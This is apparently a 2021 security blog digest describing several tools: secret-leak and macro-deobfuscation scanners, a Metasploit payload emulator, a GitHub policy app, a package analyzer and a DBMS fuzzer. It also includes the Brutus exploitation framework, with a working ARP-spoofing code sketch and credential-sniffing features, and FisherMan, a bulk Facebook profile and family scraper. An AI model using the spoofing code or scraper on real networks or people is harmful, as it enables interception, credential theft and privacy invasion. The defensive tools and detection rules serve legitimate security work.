Jsleak - A Go Code To Detect Leaks In JS Files Via Regex Patterns

18 August 2021 at 21:30
By: Zion3R


jsleak is a tool to identify sensitive data in JS files through regex patterns. Although it's built for this, you can use it to identify anything as long as you have a regex pattern for it.


How to install

Directly:

{your package manager} install pkg-config libpcre++-dev
go get github.com/0xTeles/jsleak/v2/jsleak

Compiled: release page


How to use
Usage of jsleak:
  -json string
        [+] Json output file
  -pattern string
        [+] File contains patterns to test
  -verbose
        [+] Verbose Mode

Demo
cat urls.txt | jsleak -pattern regex.txt
[+] Url: http://localhost/index.js
[+] Pattern: p([a-z]+)ch
[+] Match: peach
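
The pattern file is simply a list of regular expressions, one per line (the format is assumed from the demo above). For example, a minimal regex.txt for spotting hardcoded AWS access key IDs could be created and used like this:

echo 'AKIA[0-9A-Z]{16}' > regex.txt
cat urls.txt | jsleak -pattern regex.txt -verbose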

To Do
  • Fix output
  • Add more patterns
  • Add stdin
  • Implement JSON input
  • Fix patterns
  • Implement PCRE

Regex list

Inspired by

Thanks

@fepame, @gustavorobertux, @Jhounx, @arthurair_es



Allstar - GitHub App To Set And Enforce Security Policies

19 August 2021 at 12:30
By: Zion3R


Allstar is a GitHub App installed on organizations or repositories to set and enforce security policies. Its goal is to be able to continuously monitor and detect any GitHub setting or repository file contents that may be risky or do not follow security best practices. If Allstar finds a repository to be out of compliance, it will take an action such as create an issue or restore security settings.

The specific policies are intended to be highly configurable, to try to meet the needs of different project communities and organizations. Also, developing and contributing new policies is intended to be easy.

Allstar is developed under the OpenSSF organization, as a part of the Securing Critical Projects Working Group. The OpenSSF runs an instance of Allstar here for anyone to install and use on their GitHub organizations. However, Allstar can be run by anyone if need be, see the operator docs for more details.


Quick start

Install Allstar GitHub App on your organizations and repositories. When installing Allstar, you may review the permissions requested. Allstar asks for read access to most settings and file contents to detect security compliance. It requests write access to issues to create issues, and to checks to allow the block action.

Follow the quick start instructions to setup the configuration files needed to enable Allstar on your repositories. For more details on advanced configuration, see below.


Help! I'm getting issues created by Allstar and I don't want them.

Enable Configuration

Allstar can be enabled on individual repositories at the app level, with the option of enabling or disabling each security policy individually. For organization-level configuration, create a repository named .allstar in your organization. Then create a file called allstar.yaml in that repository.

Allstar can either be set to an opt-in or opt-out strategy. In opt-in, only those repositories explicitly listed are enabled. In opt-out, all repositories are enabled, and repositories would need to be explicitly added to opt-out. Allstar is set to opt-in by default, and therefore is not enabled on any repository immediately after installation. To continue with the default opt-in strategy, list the repositories for Allstar to be enabled on in your organization like so:

optConfig:
  optInRepos:
    - repo-one
    - repo-two

To switch to the opt-out strategy (recommended), set that option to true:

optConfig:
  optOutStrategy: true

If you wish to enable Allstar on all but a few repositories, you may use opt-out and list the repositories to disable:

optConfig:
  optOutStrategy: true
  optOutRepos:
    - repo-one
    - repo-two

Repository Override

Individual repositories can also opt in or out using configuration files inside those repositories. For example, if the organization is configured with the opt-out strategy, a repository may opt itself out by including the file .allstar/allstar.yaml with the contents:

optConfig:
  optOut: true

Conversely, this allows repositories to opt-in and enable Allstar when the organization is configured with the opt-in strategy. Because opt-in is the default strategy, this is how Allstar works if the .allstar repository doesn't exist.

At the organization-level allstar.yaml, repository override may be disabled with the setting:

optConfig:
  disableRepoOverride: true

This allows an organization-owner to have a central point of approval for repositories to request an opt-out through a GitHub PR. Understandably, Allstar or individual policies may not make sense for all repositories.


Policy Enable

Each individual policy configuration file (see below) also contains the exact same optConfig configuration object. This allows granularity to enable policies on individual repositories. A policy will not take action unless it is enabled and Allstar is enabled as a whole.


Definition

Actions

Each policy can be configured with an action that Allstar will take when it detects a repository to be out of compliance.

  • log: This is the default action, and actually takes place for all actions. All policy run results and details are logged. Logs are currently only visible to the app operator, plans to expose these are under discussion.
  • issue: This action creates a GitHub issue. Only one issue is created per policy, and the text describes the details of the policy violation. If the issue is already open, it is pinged with a comment every 24 hours (not currently user configurable). Once the violation is addressed, the issue will be automatically closed by Allstar within 5-10 minutes.
  • fix: This action is policy specific. The policy will make the changes to the GitHub settings to correct the policy violation. Not all policies will be able to support this (see below).

Proposed, but not yet implemented actions. Definitions will be added in the future.

  • block: Allstar can set a GitHub Status Check and block any PR in the repository from being merged if the check fails.
  • email: Allstar would send an email to the repository administrator(s).
  • rpc: Allstar would send an rpc to some organization-specific system.

Policies

Similar to the Allstar app enable configuration, all policies are enabled and configured with a yaml file in either the organization's .allstar repository, or the repository's .allstar directory. As with the app, policies are opt-in by default, and the default log action won't produce visible results. A simple way to enable all policies is to create a yaml file for each policy with the contents:

optConfig:
  optOutStrategy: true
  action: issue

The fix action is not implemented in any policy yet, but will be implemented in those policies where it is applicable soon.


Branch Protection

This policy's config file is named branch_protection.yaml, and the config definitions are here.

The branch protection policy checks that GitHub's branch protection settings are setup correctly according to the specified configuration. The issue text will describe which setting is incorrect. See GitHub's documentation for correcting settings.


Binary Artifacts

This policy's config file is named binary_artifacts.yaml, and the config definitions are here.

This policy incorporates the check from scorecard. Remove the binary artifact from the repository to achieve compliance. As the scorecard results can be verbose, you may need to run scorecard itself to see all the detailed information.


Outside Collaborators

This policy's config file is named outside.yaml, and the config definitions are here.

This policy checks whether any Outside Collaborators have either administrator (default) or push (optional) access to the repository. Only organization members should have this access, as otherwise untrusted members can change admin-level settings and commit malicious code.


SECURITY.md

This policy's config file is named security.yaml, and the config definitions are here.

This policy checks that the repository has a security policy file in SECURITY.md and that it is not empty. The created issue will have a link to the GitHub tab that helps you commit a security policy to your repository.


Future Policies

Example Config Repository

See this repo as an example of Allstar config being used. As the organization administrator, consider a README.md with some information on how Allstar is being used in your organization.


Contribute Policies

Interface definition.

Both the SECURITY.md and Outside Collaborators policies are quite simple to understand and good examples to copy.



REW-sploit - Emulate And Dissect MSF And *Other* Attacks

19 August 2021 at 21:30
By: Zion3R


REW-sploit

The tool has been presented at Black-Hat Arsenal USA 2021

https://www.blackhat.com/us-21/arsenal/schedule/index.html#rew-sploit-dissecting-metasploit-attacks-24086

Slides of presentation are available at https://github.com/REW-sploit/REW-sploit_docs


Need help analyzing Windows shellcode, or an attack coming from Metasploit Framework or Cobalt Strike (or maybe other malicious or obfuscated code)? Do you need to automate tasks with simple scripting? Do you want help decrypting MSF-generated traffic by extracting keys from payloads?

REW-sploit is here to help Blue Teams!

Here a quick demo:


Install

Installation is very easy. I strongly suggest creating a specific Python env for it:

# python -m venv <your-env-path>/rew-sploit
# source <your-env-path>/bin/activate
# git clone https://github.com/REW-sploit/REW-sploit.git
# cd REW-sploit
# pip install -r requirements.txt
# ./apply_patch.py -f
# ./rew-sploit

If you prefer, you can use the Dockerfile. To create the image:

docker build -t rew-sploit/rew-sploit .

and then start it (sharing the /tmp/ folder):

docker run --rm -it --name rew-sploit -v /tmp:/tmp rew-sploit/rew-sploit

You see an apply_patch.py script in the installation sequence. This is required to apply a small patch to the speakeasy-emulator (https://github.com/fireeye/speakeasy/) to make it compatible with REW-sploit. You can easily revert the patch with ./apply_patch.py -r if required.

Optionally, you can also install Cobalt-Strike Parser:

# cd REW-sploit/extras
# git clone https://github.com/Sentinel-One/CobaltStrikeParser.git

Standing on the shoulder of giants

REW-sploit is based on a couple of great frameworks, Unicorn and speakeasy-emulator (but also other libraries). Thanks to everyone and thanks to the OSS movement!


How it works

In general we can say that whilst Red Teams have a lot of tools that help them "automate" attacks, Blue Teams are a bit "tool-less". So I thought I would build something to help Blue Team analysis.

REW-sploit can take a shellcode/DLL/EXE, emulate its execution, and give you a set of information to help you understand what is going on. Examples of the extracted information are:

You can find several examples of the current capabilities here below:


Fixups

In some cases emulation simply broke, for different reasons; for example, some obfuscation techniques confused the emulation engine. So I implemented some ad-hoc fixups (you can enable them by using the -F option of the emulate_payload command). Fixups are implemented in modules/emulate_fixups.py. Currently we have:

Unicorn issue #1092:

    #
# Fixup #1
# Unicorn issue #1092 (XOR instruction executed twice)
# https://github.com/unicorn-engine/unicorn/issues/1092
# #820 (Incorrect memory view after running self-modifying code)
# https://github.com/unicorn-engine/unicorn/issues/820
# Issue: self-modifying code in the same Translated Block (16 bytes?)
# Yes, I know...this is a huge kludge... :-/
#

FPU emulation issue:

    #
# Fixup #2
# The "fpu" related instructions (FPU/FNSTENV), used to recover EIP, sometimes
# return the wrong addresses.
# In this case, I need to track the first FPU instruction and then place
# its address in STACK when FNSTENV is called
#

Trap Flag evasion:

    #
# Fixup #3
# Trap Flag evasion technique
# https://unit42.paloaltonetworks.com/single-bit-trap-flag-intel-cpu/
#
# The call of the RDTSC with the trap flag enabled, cause an unhandled
# interrupt. Example code:
# pushf
# or dword [esp], 0x100
# popf
# rdtsc
#
# Any call to RDTSC with Trap Flag set will be intercepted and TF will
# be cleared
#
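
As a usage sketch, enabling these fixups during emulation from the REW-sploit console might look like the following (the payload-file argument is an assumption; only the -F option of emulate_payload is documented above):

emulate_payload shellcode.bin -F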

Customize YARA rules

File modules/emulate_rules.py contains the YARA rules used to intercept the interesting parts of the code, in order to implement instrumentation. I tried to comment these sections as much as possible, in order to let you create your own rules (please share them with a pull request if you think they can help others). For example:

#
# Payload Name: [MSF] windows/meterpreter/reverse_tcp_rc4
# Search for : mov esi,dword ptr [esi]
# xor esi,0x<const>
# Used for : this xor instruction contains the constant used to
# encrypt the length of the payload that will be sent as 2nd
# stage
# Architecture: x32
#
yara_reverse_tcp_rc4_xor_32 = 'rule reverse_tcp_rc4_xor { \
strings: \
$opcodes_1 = { 8b 36 \
81 f6 ?? ?? ?? ?? } \
condition: \
$opcodes_1 }'

Issues

Please, open Issues if you find something that not work or that can be improved. Thanks!



FisherMan - CLI Program That Collects Information From Facebook User Profiles Via Selenium

20 August 2021 at 12:30
By: Zion3R


Search for public profile information on Facebook


Installation
# clone the repo
$ git clone https://github.com/Godofcoffe/FisherMan

# change the working directory to FisherMan
$ cd FisherMan

# install the requirements
$ python3 -m pip install -r requirements.txt

Pre-requisites
  • Make sure you have the executable "geckodriver" installed on your machine.

Usage
$ python3 fisherman.py --help
usage: fisherman.py [-h] [--version] [-u USERNAME [USERNAME ...] | -i ID
[ID ...] | --use-txt TXT_FILE | -S USER] [-sf]
[--specify {0,1,2,3,4,5} [{0,1,2,3,4,5} ...]] [-s] [-b]
[--email EMAIL] [--password PASSWORD] [-o] [-c] [-v | -q]

FisherMan: Extract information from facebook profiles. (Version 3.4.0)

optional arguments:
-h, --help show this help message and exit
--version Shows the current version of the program.
-u USERNAME [USERNAME ...], --username USERNAME [USERNAME ...]
Defines one or more users for the search.
-i ID [ID ...], --id ID [ID ...]
Set the profile identification number.
--use-txt TXT_FILE Replaces the USERNAME parameter with a user list in a
txt.
-S USER, --search USER
It does a shallow search for the username. Replace the
spaces with '.'(period).
-sf, --scrape-family If this parameter is passed, the information from
family members will be scraped if available.
--specify {0,1,2,3,4,5} [{0,1,2,3,4,5} ...]
Use the index number to return a specific part of the
page. about: 0,about_contact_and_basic_info:
1,about_family_and_relationships: 2,about_details:
3,about_work_and_education: 4,about_places: 5.
-s, --several Returns extra data like profile picture, number of
followers and friends.
-b, --browser Opens the browser/bot.
--email EMAIL If the profile is blocked, you can define your
account, however you have the search user in your
friends list.
--password PASSWORD Set the password for your facebook account, this
parameter has to be used with --email.
-o, --file-output Save the output data to a .txt file.
-c, --compact Compress all .txt files. Use together with -o.
-v, -d, --verbose, --debug
It shows in detail the data search process.
-q, --quiet Eliminates and simplifies some script outputs for a
simpler and more discrete visualization.

To search for a user:

  • User name: python3 fisherman.py -u name name.profile name.profile2
  • ID: python3 fisherman.py -i 000000000000

The username must be found on the facebook profile link, such as:

https://facebook.com/name.profile/

It is also possible to load multiple usernames from a .txt file; this can be useful for bulk, brute-force-style lookups:

python3 fisherman.py --use-txt filename.txt
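
For illustration, a hypothetical users.txt (assuming one username per line, matching the usernames accepted by -u) could look like:

name.profile
name.profile2
another.name

python3 fisherman.py --use-txt users.txt -o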

Some profiles restrict which information is visible to arbitrary accounts, so you can log in with your own account to extract it. Note: this should be used as a last resort, and the target profile must be on your friends list:

python3 fisherman.py --email [email protected] --password yourpass

Some situations:
  • For a complete, massive scrape:

    python3 fisherman.py --use-txt file -o -c -sf

    With a file containing dozens of names, one per line, you can run a complete "scan" that collects each profile's information, and even that of their family members; the output will be compressed into a .zip.

  • For specific parts of the account:

    • Basic data: python3 fisherman.py -u name --specify 0
    • Family and relationships: python3 fisherman.py -u name --specify 2
    • It is still possible to mix: python3 fisherman.py -u name --specify 0 2
  • To get additional things like profile picture, how many followers and how many friends:

    python3 fisherman.py -u name -s

This tool only extracts information that is public; do not use it for private or illegal purposes.

LICENSE

BSD 3-Clause ยฉ FisherMan Project

Original Creator - Godofcoffe



PackageDNA - Tool To Analyze Software Packages Of Different Programming Languages That Are Being Or Will Be Used In Their Codes

20 August 2021 at 21:30
By: Zion3R


This tool gives developers, researchers and companies the ability to analyze software packages of different programming languages that are being or will be used in their codes, providing information that allows them to know in advance whether the library complies with secure development processes, whether it is currently supported, and whether it contains possible backdoors (malicious embedded code), along with typosquatting analysis, the version history, and reported vulnerabilities (CVEs) of the package.


Installation

Clone this repository with:

git clone https://github.com/ElevenPaths/packagedna

PackageDNA uses python-magic, a simple wrapper around the libmagic C library, which MUST be installed as well:

Debian/Ubuntu
$ sudo apt-get install libmagic1

Windows
You will need DLLs for libmagic. @julian-r has uploaded a version of this project that includes binaries
to PyPI: https://pypi.python.org/pypi/python-magic-bin/0.4.14
Other sources of the libraries in the past have been File for Windows.
You will need to copy the file magic out of [binary-zip]\share\misc, and pass its location to Magic(magic_file=...).

If you are using a 64-bit build of python, you will need 64-bit libmagic binaries, which can be found here: https://github.com/pidydx/libmagicwin64.
Newer versions can be found here: https://github.com/nscaife/file-windows.

OSX
When using Homebrew: brew install libmagic
When using macports: port install file


More details: https://pypi.org/project/python-magic/
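
As a quick sanity check that libmagic is correctly installed, here is a minimal sketch using python-magic's documented API (the file paths below are placeholders):

import magic

# With a system-wide magic database (Linux/macOS):
m = magic.Magic()
print(m.from_file("/bin/ls"))  # e.g. "ELF 64-bit LSB executable, ..."

# On Windows, point python-magic at the extracted database explicitly:
# m = magic.Magic(magic_file=r"C:\libmagic\share\misc\magic")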

Run setup for installation:

python3 setup.py install --user

External Modules

PackageDNA uses external modules for its analysis that you should install beforehand:

Microsoft AppInspector

https://github.com/microsoft/ApplicationInspector

Virus Total API

https://www.virustotal.com/

LibrariesIO API

https://libraries.io/

Rubocop

https://github.com/rubocop/rubocop

After installation, you should configure the external modules via option [7] Configurations in the main menu.

[1] VirusTotal API Key: Your API KEY
[2] AppInspector absolute path: /Local/Path/MSAppInpsectorInstallation
[3] Libraries.io API Key: Your API KEY
[4] Github Token: Your Token
[B] Back
[X] Exit

NOTE: External modules are not mandatory; PackageDNA will continue its execution without them. However, we recommend configuring all of these modules so that the tool performs a complete analysis.


Running PackageDNA

Inside the PackageDNA directory:

./packagedna.py
_____              _                          ____     __     _  _______ 
| __ \ | | | __ \ | \ | || ___ |
| |__) |__ __ ____ | | __ __ __ ____ ___ | | \ \ | |\ \ | || |___| |
| ___// _` |/ __)| |/ / / _` | / _ | / _ \| | | || | \ \| || ___ |
| | | (_| || (__ | |\ \ | (_| || (_| || __/| |__/ / | | \ || | | |
|_| \__,_|\____)|_| \_\ \__,_| \__ | \___||_____/ |_| \__||_| |_|
__| |
(____|

Modular Packages Analyzer Framework
By ElevenPaths https://www.elevenpaths.com/
Usage: python3 ./packagedna.py

[*] -------------------------------------------------------------------------------------------------------------- [*]
[!] Select from the menu:
[*] -------------------------------------------------------------------------------------------------------------- [*]
[1] Analyze Package (Last Version)
[2] Analyze Package (All Versions)
[3] Analyze local package
[4] Information gathering
[5] Upload file and analyze all Packages
[6] List previously analyzed packages
[7] Configurations
[X] Exit
[*] -------------------------------------------------------------------------------------------------------------- [*]
[!] Enter your selection:


Brutus - An Educational Exploitation Framework Shipped On A Modular And Highly Extensible Multi-Tasking And Multi-Processing Architecture

21 August 2021 at 12:30
By: Zion3R


An educational exploitation framework shipped on a modular and highly extensible multi-tasking and multi-processing architecture.


Brutus: an Introduction

Looking for version 1? See the branches in this repository.

Brutus is an educational exploitation framework written in Python. It automates pre- and post-connection network-based exploits, as well as web-based reconnaissance. As a lightweight framework, Brutus aims to minimize reliance on third-party dependencies. Optimized for Kali Linux, Brutus is also compatible with macOS and most Linux distributions, featuring a fully interactive command-line interface and a versatile plugin system.

Brutus features a highly-extensible, modular architecture. The included exploits (the plugins layer) consist of several decoupled modules that run on a 'tasking layer' comprised of thread pools and thread-safe, async queues (whichever is most appropriate for the given module). The main thread runs atop a multi-processing pool that manages app context and dispatches new processes so tasks can run in the background, in separate shells, etc.
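
As a toy sketch of that tasking pattern (illustrative only, not Brutus' actual code), modules can push work onto a thread-safe queue that a small pool of worker threads drains:

import queue
from concurrent.futures import ThreadPoolExecutor

tasks = queue.Queue()  # thread-safe work queue shared by modules

def worker():
    while True:
        job = tasks.get()
        if job is None:  # sentinel: shut this worker down
            break
        job()
        tasks.task_done()

with ThreadPoolExecutor(max_workers=4) as pool:
    for _ in range(4):
        pool.submit(worker)
    tasks.put(lambda: print("module task ran"))
    tasks.join()  # block until all queued work is done
    for _ in range(4):
        tasks.put(None)  # stop the workers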

The UI layer is also decoupled and extensible. By default, Brutus ships with a menu-based command-line interface UI, but there's no reason you can't add adapters for a GUI, an argument parser, or even an HTTP API or remote procedure call.

Last, Brutus has a utility layer with common faculties for file-system operations, shell (terminal emulator) management, persistence methods, and system metadata.

If you're just interested in some Python hacking, feel free to pull the scripts directly - each module can be invoked standalone.


Demos

Web Scanning and Payload Compilation Demo: watch mp4


Installation

You will probably want the following dependencies:

  • sslstrip
  • pipenv

Brutus is optimized for Kali Linux. There's lots of information online about how to run Kali Linux in a VM.

To install:

pipenv install

Usage

Run:

pipenv run brutus

Test:

pipenv run test

Lint:

pipenv run lint

Setup Git Hooks for Development:

pipenv run setup

Feel free to open PRs with feature proposals, bugfixes, et al. Note that much of this project is still in progress. The base is there and ready for you to build upon.


Brutus: Features and Included Modules

Brutus includes several modules which can be generalized as belonging to three macro-categories: network-based, web-based, and payloads. The latter category is a library of compilers and accompanying payloads - payloads can be compiled via Brutus' interactive command-line menu; compiled payloads can subsequently be loaded into many of Brutus' applicable network-based modules.

The base layer of Brutus utilizes POSIX threads for concurrent multi-tasking. Some modules - i.e. essentially anything heavily I/O bound - instead utilize Python's async I/O libraries and run on an abstraction atop Python's default event loop.

Included Utilities/Scripts

  • IP Table Management
  • Downgrade HTTPS to HTTP
  • Enable Monitor Mode
  • Enable Port Forwarding
  • Keylogger

Documentation

48-bit MAC Address Changer (view source)

NOTE: This tool is for 48-bit MACs, with a %02x default byte format.

MAC (Media Access Control) is a permanent, physical, and unique address assigned to network interfaces by device manufacturers. This means even your wireless card, for instance, has its own unique MAC address.

The MAC address, analogous to an IP on the internet, is utilized within a network in order to facilitate the proper delivery of resources and data (i.e. packets). An interaction will generally consist of a source MAC and a destination MAC. MAC addresses can identify you, be filtered, or otherwise access-restricted.

Important to note: these unique addresses are not ephemeral; they are persistent and will remain associated with a device even if a user installs it in another machine. But the two don't have to be inextricably intertwined...

This module will accept as user-input any given wireless device and any valid MAC address to which the user wishes to reassign said device. The program is simple such that I need not explain it much further: it utilizes the subprocess module to automate the sequence of the necessary shell commands to bring the wireless interface down, reassign the MAC, and reinitialize it.

If you are actively changing your MAC address, it might be prudent to have some sort of validation structure or higher order method to ensure that 1) the wireless device exists, 2) the wireless device accommodates a MAC address, 3) the user-input MAC address is of a valid format, and 4) the wireless device's MAC address has successfully been updated. This tool automates these functions.

By selecting the 'generate' option in lieu of a specific MAC address, the program will generate a valid MAC address per IEEE specifications. I'm excited to have implemented extended functionality for generating not only wholly random (and valid) MAC addresses, but MAC addresses which either begin with a specific vendor prefix (OUI), or are generated with multicast and/or UAA options. These options trigger byte-code logic in the generator method, which are augmented per IEEE specifications. Learn more about MAC addresses here.
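
For intuition, a minimal sketch of the IEEE bit rules involved (an illustration, not Brutus' actual implementation): in the first octet, bit 0 is the multicast flag and bit 1 distinguishes locally administered (set) from universally administered (clear) addresses:

import random

def generate_mac(multicast=False, uaa=False):
    first = random.randint(0x00, 0xFF)
    # Bit 0: multicast (set) vs unicast (clear).
    first = first | 0x01 if multicast else first & 0xFE
    # Bit 1: locally administered (set) vs universally administered (clear).
    first = first & 0xFD if uaa else first | 0x02
    rest = [random.randint(0x00, 0xFF) for _ in range(5)]
    return ":".join("%02x" % octet for octet in [first] + rest)

print(generate_mac())  # e.g. 0a:1b:2c:3d:4e:5f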


ARP-Based Network Scanner (view source)

The network scanner is another very useful tool, and a formidable one when used in conjunction with the aforementioned MAC changer. This scanner utilizes ARP request functionality by accepting as user input a valid ipv4 or ipv6 IP address and accompanying - albeit optional - subnet range.

The program then takes the given IP and/or range, then validates them per IEEE specifications (again, this validation is run against ipv4 and ipv6 standards). Finally, a broadcast object is instantiated with the given IP and a generated ethernet frame; this object returns to us a list of all connected devices within the given network and accompanying range, mapping their IPs to respective MAC addresses.

The program outputs a table with these associations, which then might be used as input for the MAC changer should circumstances necessitate it.
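
A minimal sketch of the underlying scanning idea with scapy (assumed installed; an illustration, not Brutus' exact code):

from scapy.all import ARP, Ether, srp

def arp_scan(cidr="192.168.1.0/24"):  # placeholder range
    # Broadcast an ARP who-has request for every address in the range.
    answered, _ = srp(Ether(dst="ff:ff:ff:ff:ff:ff") / ARP(pdst=cidr),
                      timeout=2, verbose=False)
    # Map each responding IP to its MAC address.
    return [(received.psrc, received.hwsrc) for _, received in answered]

for ip, mac in arp_scan():
    print(ip, mac)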


Automated ARP Spoofing (view source)

The ARP Spoof module enables us to redirect the flow of packets in a given network by simultaneously manipulating the ARP tables of a given target client and its network's gateway. This module auto-enables port forwarding during this process, and dynamically constructs and sends ARP packets.

When the module is terminated by the user, the targets' ARP tables are reset, so as not to leave the controller in a precarious situation (plus, it's the nice thing to do).

Because this process places the controller in the middle of the packet-flow between the client and AP, the controller therefore has access to all dataflow (dealing with potential encryption of said data is a task for another script). From here, the myriad options for packet-flow orchestration become readily apparent: surrogation of code by way of automation and regular expressions, forced redirects, remote access, et al. Fortunately, Brutus can automate this, too.
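
The core of the technique can be sketched with scapy as follows (placeholder addresses; a simplification of what the module automates, including the table reset on exit):

from scapy.all import ARP, send

def poison(target_ip, target_mac, impersonated_ip):
    # op=2 is an ARP reply: it tells target_ip that impersonated_ip
    # lives at our (the sender's) MAC address.
    send(ARP(op=2, pdst=target_ip, hwdst=target_mac, psrc=impersonated_ip),
         verbose=False)

def restore(target_ip, target_mac, real_ip, real_mac):
    # Re-advertise the legitimate IP-to-MAC mapping to undo the poisoning.
    send(ARP(op=2, pdst=target_ip, hwdst=target_mac, psrc=real_ip,
             hwsrc=real_mac), count=4, verbose=False)

# Poison both directions, client and gateway:
# poison("10.0.0.5", "aa:bb:cc:dd:ee:ff", "10.0.0.1")  # lie to the client
# poison("10.0.0.1", "11:22:33:44:55:66", "10.0.0.5")  # lie to the gateway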


HTTP Packet Sniffer (view source)

The packet sniffer is an excellent module to employ after running the ARP Spoofer; it creates a dataflow of all intercepted HTTP packets' data, which includes either URLs or possible user credentials.

The script is extensible and can accommodate a variety of protocols by instantiating the listener object with one of many available filters. Note that Brutus automatically downgrades HTTPS, so unless HSTS is involved, the dataflow should be viable for reconnaissance.
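
That listener pattern can be sketched with scapy's HTTP layer (scapy >= 2.4.3; the interface name is a placeholder, and this is not Brutus' exact filter set):

from scapy.all import sniff
from scapy.layers.http import HTTPRequest

def on_packet(packet):
    if packet.haslayer(HTTPRequest):
        request = packet[HTTPRequest]
        # Host + Path together reconstruct the visited URL.
        print(request.Host.decode() + request.Path.decode())

sniff(iface="eth0", store=False, prn=on_packet)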

Disclaimer: This software and all contents therein were created for research use only. I neither condone nor hold, in any capacity, responsibility for the actions of those who might intend to use this software in a manner malicious or otherwise illegal.



XLMMacroDeobfuscator - Extract And Deobfuscate XLM Macros (A.K.A Excel 4.0 Macros)

21 August 2021 at 21:30
By: Zion3R


XLMMacroDeobfuscator can be used to decode obfuscated XLM macros (also known as Excel 4.0 macros). It utilizes an internal XLM emulator to interpret the macros, without fully executing the code.

It supports the xls, xlsm, and xlsb formats.

It uses xlrd2, pyxlsb2 and its own parser to extract cells and other information from xls, xlsb and xlsm files, respectively.

You can also find the XLM grammar in xlm-macro-lark.template


Installing the emulator
  1. Install using pip
pip install XLMMacroDeobfuscator
  2. Install the latest development version
pip install -U https://github.com/DissectMalware/xlrd2/archive/master.zip
pip install -U https://github.com/DissectMalware/pyxlsb2/archive/master.zip
pip install -U https://github.com/DissectMalware/XLMMacroDeobfuscator/archive/master.zip

Running the emulator

To deobfuscate macros in Excel documents:

xlmdeobfuscator --file document.xlsm

To get only the deobfuscated macros, without any indentation:

xlmdeobfuscator --file document.xlsm --no-indent --output-formula-format "[[INT-FORMULA]]"

To export the output in JSON format:

xlmdeobfuscator --file document.xlsm --export-json result.json

To see a sample JSON output, please check this link out.

To use a config file:

xlmdeobfuscator --file document.xlsm -c default.config

The default.config file must be a valid JSON file, such as:

{
    "no-indent": true,
    "output-formula-format": "[[CELL-ADDR]] [[INT-FORMULA]]",
    "non-interactive": true,
    "output-level": 1
}

Command Line

_ _______
|\ /|( \ ( )
( \ / )| ( | () () |
\ (_) / | | | || || |
) _ ( | | | |(_)| |
/ ( ) \ | | | | | |
( / \ )| (____/\| ) ( |
|/ \|(_______/|/ \|
______ _______ _______ ______ _______ _______ _______ _______ _________ _______ _______
( __ \ ( ____ \( ___ )( ___ \ ( ____ \|\ /|( ____ \( ____ \( ___ )\__ __/( ___ )( ____ )
| ( \ )| ( \/| ( ) || ( ) )| ( \/| ) ( || ( \/| ( \/| ( ) | ) ( | ( ) || ( )|
| | ) || (__ | | | || (__/ / | (__ | | | || (_____ | | | (___) | | | | | | || (____)|
| | | || __) | | | || __ ( | __) | | | |(_____ )| | | ___ | | | | | | || __)
| | ) || ( | | | || ( \ \ | ( | | | | ) || | | ( ) | | | | | | || (\ (
| (__/ )| (____/\| (___) || )___) )| ) | (___) |/\____) || (____/\| ) ( | | | | (___) || ) \ \__
(______/ (_______/(_______)|/ \___/ |/ (_______)\_______)(_______/|/ \| )_( (_______)|/ \__/


XLMMacroDeobfuscator(v0.1.7) - https://github.com/DissectMalware/XLMMacroDeobfuscator

usage: deobfuscator.py [-h] [-c FILE_PATH] [-f FILE_PATH] [-n] [-x] [-2]
[--with-ms-excel] [-s] [-d DAY]
[--output-formula-format OUTPUT_FORMULA_FORMAT]
[--no-indent] [--export-json FILE_PATH]
[--start-point CELL_ADDR] [-p PASSWORD]
[-o OUTPUT_LEVEL]

optional arguments:
-h, --help show this help message and exit
-c FILE_PATH, --config_file FILE_PATH
Specify a config file (must be a valid JSON file)
-f FILE_PATH, --file FILE_PATH
The path of a XLSM file
-n , --noninteractive Disable interactive shell
-x, --extract-only Only extract cells without any emulation
-2, --no-ms-excel [Deprecated] Do not use MS Excel to process XLS files
--with-ms-excel Use MS Excel to process XLS files
-s, --start-with-shell
Open an XLM shell before interpreting the macros in
the input
-d DAY, --day DAY Specify the day of month
--output-formula-format OUTPUT_FORMULA_FORMAT
Specify the format for output formulas ([[CELL-ADDR]],
[[INT-FORMULA]], and [[STATUS]]
--no-indent Do not show indent before formulas
--export-json FILE_PATH
Export the output to JSON
--start-point CELL_ADDR
Start interpretation from a specific cell address
-p PASSWORD, --password PASSWORD
Password to decrypt the protected document
-o OUTPUT_LEVEL, --output-level OUTPUT_LEVEL
Set the level of details to be shown (0:all commands,
1: commands no jump 2:important commands 3:strings in
important commands).
--timeout N stop emulation after N seconds (0: not interruption
N>0: stop emulation after N seconds)

Library

The following example shows how XLMMacroDeobfuscator can be used in a python project to deobfuscate XLM macros:

from XLMMacroDeobfuscator.deobfuscator import process_file

result = process_file(file='path/to/an/excel/file',
                      noninteractive=True,
                      noindent=True,
                      output_formula_format='[[CELL-ADDR]], [[INT-FORMULA]]',
                      return_deobfuscated=True,
                      timeout=30)

for record in result:
    print(record)
  • note: the xlmdeobfuscator logo will not be shown when you use it as a library

Requirements

Please read requirements.txt to get the list of python libraries that XLMMacroDeobfuscator is dependent on.

xlmdeobfuscator can be executed on any OS to extract and deobfuscate macros in xls, xlsm, and xlsb files. You do not need to install MS Excel.

Note: if you want to use MS Excel (on Windows), you need to install the pywin32 library and use the --with-ms-excel switch. If --with-ms-excel is used, xlmdeobfuscator first attempts to load xls files with MS Excel; if that fails, it uses the xlrd2 library.


Projects Using XLMMacroDeobfuscator

XLMMacroDeobfuscator is adopted in the following projects:

Please contact me if you have incorporated XLMMacroDeobfuscator in your project.


How to Contribute

If you found a bug or would like to suggest an improvement, please create a new issue on the issues page.

Feel free to contribute to the project forking the project and submitting a pull request.

You can reach me (@DissectMalware) on Twitter via a direct message.



SQLancer - Detecting Logic Bugs In DBMS

22 August 2021 at 12:30
By: Zion3R


SQLancer (Synthesized Query Lancer) is a tool to automatically test Database Management Systems (DBMS) in order to find logic bugs in their implementation. We refer to logic bugs as those bugs that cause the DBMS to fetch an incorrect result set (e.g., by omitting a record).

SQLancer operates in the following two phases:

  1. Database generation: The goal of this phase is to create a populated database, and stress the DBMS to increase the probability of causing an inconsistent database state that could be detected subsequently. First, random tables are created. Then, SQL statements are randomly chosen to generate, modify, and delete data. Other statements, such as those to create indexes and views, or to set DBMS-specific options, are also sent to the DBMS.
  2. Testing: The goal of this phase is to detect the logic bugs based on the generated database. See Testing Approaches below.

Getting Started

Requirements:

  • Java 8 or above
  • Maven (sudo apt install maven on Ubuntu)
  • The DBMS that you want to test (SQLite is an embedded DBMS and is included)

The following commands clone SQLancer, create a JAR, and start SQLancer to test SQLite using Non-optimizing Reference Engine Construction (NoREC):

git clone https://github.com/sqlancer/sqlancer
cd sqlancer
mvn package -DskipTests
cd target
